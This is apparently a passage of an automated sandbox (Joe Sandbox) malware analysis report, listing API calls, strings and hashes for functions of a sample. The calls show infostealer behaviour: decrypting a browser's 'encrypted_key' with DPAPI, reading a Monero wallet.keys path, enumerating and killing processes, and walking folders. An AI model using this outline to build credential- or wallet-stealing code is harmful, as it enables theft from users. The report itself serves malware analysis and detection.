                        • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                        • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                        • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                        • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39
                        • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                        • Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                        • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                        • Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                        • Part of subcall function 00549B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
                        • Part of subcall function 00549B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
                        • Part of subcall function 00549B60: LocalFree.KERNEL32(?), ref: 00549BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 6e6f7b32bbea068a383dfda10233e4394845f69b2a30467512d25d6de82af9ba
                      • Instruction ID: 2977a545f589fac0b55f417afe6e7a704eeb23ec91998af4afe6aff9a63ab577
                      • Opcode Fuzzy Hash: 6e6f7b32bbea068a383dfda10233e4394845f69b2a30467512d25d6de82af9ba
                      • Instruction Fuzzy Hash: 7F3144B5D10109ABCF14DFE4DC96EEF7BB8BF48304F144519E905A7241EB349A04CBA5
                      APIs
                      • memset.MSVCRT ref: 005594EB
                        • Part of subcall function 00558D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0055951E,00000000), ref: 00558D5B
                        • Part of subcall function 00558D50: RtlAllocateHeap.NTDLL(00000000), ref: 00558D62
                        • Part of subcall function 00558D50: wsprintfW.USER32 ref: 00558D78
                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005595AB
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 005595C9
                      • CloseHandle.KERNEL32(00000000), ref: 005595D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                      • String ID:
                      • API String ID: 3729781310-0
                      • Opcode ID: 4b2d22210537b0c952ca94e534c35066dada4d8f818927a6e8de18b8ff188a22
                      • Instruction ID: 4bff82170f27304cb8d01bade7854c12514b4c2f8ca12b31bc89e52b6fbc95bd
                      • Opcode Fuzzy Hash: 4b2d22210537b0c952ca94e534c35066dada4d8f818927a6e8de18b8ff188a22
                      • Instruction Fuzzy Hash: B1311071940208EFDB14DBD0CD59BEDB774FF44301F20855AE906AA184EB789A49CB55
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005605B7), ref: 005586CA
                      • Process32First.KERNEL32(?,00000128), ref: 005586DE
                      • Process32Next.KERNEL32(?,00000128), ref: 005586F3
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • CloseHandle.KERNEL32(?), ref: 00558761
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
                      • Instruction ID: 69418c66d48af56909c3f3ebe07d03f2d9dcaf19793ec767346d2dbd578380b9
                      • Opcode Fuzzy Hash: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
                      • Instruction Fuzzy Hash: 69316F71911119ABDB24DF50CC65FEEBB78FB49701F10429AE90AA21A0DB346A49CFA1
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E00,00000000,?), ref: 005579B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 005579B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,00560E00,00000000,?), ref: 005579C4
                      • wsprintfA.USER32 ref: 005579F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: a9ed31b1856eed6ea6ece2e161c329108f52c0b614767a9c24a38a1d88788f4b
                      • Instruction ID: 83dcc30871bcf1bd2f13c33be32feef1444f6ac2b1d1a96f59e62398c51665cd
                      • Opcode Fuzzy Hash: a9ed31b1856eed6ea6ece2e161c329108f52c0b614767a9c24a38a1d88788f4b
                      • Instruction Fuzzy Hash: 3C1118B2944118AADB149FC9DD45BBEBBF8FB4CB11F10411AF605A2280E23D5940CBB5
                      APIs
                      • __getptd.LIBCMT ref: 0055C74E
                        • Part of subcall function 0055BF9F: __amsg_exit.LIBCMT ref: 0055BFAF
                      • __getptd.LIBCMT ref: 0055C765
                      • __amsg_exit.LIBCMT ref: 0055C773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0055C797
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: dd9a5f26e514f1158d7bb8258088d4190c5543b1c26cfbccb7cdc3dc6615e3ff
                      • Instruction ID: 9075b19bca1c2e1648a47cb651a9ceb0be81e56fa4b7b0f54fc78a1d3ff9cfb6
                      • Opcode Fuzzy Hash: dd9a5f26e514f1158d7bb8258088d4190c5543b1c26cfbccb7cdc3dc6615e3ff
                      • Instruction Fuzzy Hash: E2F096329107129FE720BBB8581E7493FA0BF44717F14414FFC14A75D2DB6459489F56
                      APIs
                        • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00554F7A
                      • lstrcat.KERNEL32(?,00561070), ref: 00554F97
                      • lstrcat.KERNEL32(?,01028BB8), ref: 00554FAB
                      • lstrcat.KERNEL32(?,00561074), ref: 00554FBD
                        • Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
                        • Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943
                        • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                        • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                        • Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                        • Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: 35b5f1682a6adc56160cad7ce8b1d0b1cd8f8343cd55b50636e63bea7d97e88e
                      • Instruction ID: c764d443fec126576a83e8c0cf76ee99363e59a14047bbfa82e47d8c3e9b7282
                      • Opcode Fuzzy Hash: 35b5f1682a6adc56160cad7ce8b1d0b1cd8f8343cd55b50636e63bea7d97e88e
                      • Instruction Fuzzy Hash: 6821DA7694020977D754FBB0DC5AEEE373CBB94300F008546B65A93181EE789ACC8FA6